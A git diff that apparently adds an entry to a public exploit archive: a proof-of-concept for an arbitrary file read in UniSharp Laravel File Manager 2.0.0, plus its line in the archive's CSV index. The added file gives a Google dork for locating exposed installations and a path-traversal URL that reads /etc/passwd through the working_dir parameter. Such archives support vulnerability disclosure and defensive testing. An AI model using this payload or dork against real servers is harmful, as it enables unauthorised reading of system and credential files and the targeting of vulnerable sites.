diff --git a/exploits/php/webapps/48166.txt b/exploits/php/webapps/48166.txt
new file mode 100644
index 000000000..7baaa901c
--- /dev/null
+++ b/exploits/php/webapps/48166.txt
@@ -0,0 +1,13 @@
+# Exploit Title: UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read
+# Google Dork: inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io
+# Date: 2020-02-04
+# Exploit Author: NgoAnhDuc
+# Vendor Homepage: https://github.com/UniSharp/laravel-filemanager
+# Software Link: https://github.com/UniSharp/laravel-filemanager
+# Version: v2.0.0-alpha8 & v2.0.0
+# Tested on: v2.0.0-alpha8 & v2.0.0
+# CVE : N/A
+
+PoC:
+
+http://localhost/laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6f9af0733..4904981d8 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42431,3 +42431,4 @@ id,file,description,date,author,type,platform,port
 48162,exploits/php/webapps/48162.txt,"Alfresco 5.2.4 - Persistent Cross-Site Scripting",2020-03-03,"Alexandre ZANNI",webapps,php,
 48163,exploits/php/webapps/48163.txt,"GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection",2020-03-03,emaragkos,webapps,php,
 48164,exploits/hardware/webapps/48164.txt,"RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection",2020-03-03,"Olga Villagran",webapps,hardware,
+48166,exploits/php/webapps/48166.txt,"UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read",2020-03-04,NgoAnhDuc,webapps,php,